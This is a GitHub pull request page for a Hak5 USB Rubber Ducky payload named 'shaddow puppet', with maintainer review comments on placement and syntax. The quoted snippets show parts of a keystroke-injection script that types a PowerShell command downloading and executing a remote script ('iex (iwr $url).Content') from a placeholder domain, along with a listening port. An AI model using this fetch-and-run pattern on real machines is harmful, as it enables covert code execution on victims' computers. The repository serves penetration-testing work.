Skip to content

shaddow puppet#537

Open
CodeRacer1 wants to merge 2 commits into
hak5:masterfrom
CodeRacer1:patch-2
Open

shaddow puppet#537
CodeRacer1 wants to merge 2 commits into
hak5:masterfrom
CodeRacer1:patch-2

Conversation

@CodeRacer1

Copy link
Copy Markdown

No description provided.

@CodeRacer1 CodeRacer1 changed the title payload.txt shaddow puppet May 17, 2025
Comment thread payload.txt

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is in the incorrect your payload.txt file should be placed within payloads/library/CATEGORY/PAYLOAD/playload.txt
If your category is remote access, then your payload should be placed in

payloads/library/incident_response/Shadowpuppet/payload.txt

Comment thread payload.txt
STRING LISTEN_PORT
STRING ";$url='"
STRING REMOTE_PS_URL
STRING "';iex (iwr $url).Content"

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can compress this STRING ENTER into one line by using STRINGLN

STRINGLN "';iex (iwr $url).Content"

Comment thread payload.txt

REM ─── CONFIG ───────────────────────────────────────
DEFINE EXECUTE_PAYLOAD TRUE
DEFINE REMOTE_PS_URL https://yourdomain.com/streamer/stream.ps1

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please include a readme.md explaining your payload and its configurations so the end user has a better understanding of what the payload is doing and what needs to be they need change.

@hak5peaks hak5peaks added the pending requested changes requires changes before merge label May 21, 2025
@hak5peaks

Copy link
Copy Markdown
Member

This seems to be a duplicate PR? Please close your other PR

Comment thread payload.txt

ATTACKMODE HID
LED_OFF
DELAY 500

Copy link
Copy Markdown
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If your target machine is windows, consider using EXTENSION PASSIVE_WINDOWS_DETECT this allows the Ducky to dynamically determine when the target machine is accepting keystrokes removing the need for a long start delay.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

pending requested changes requires changes before merge

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants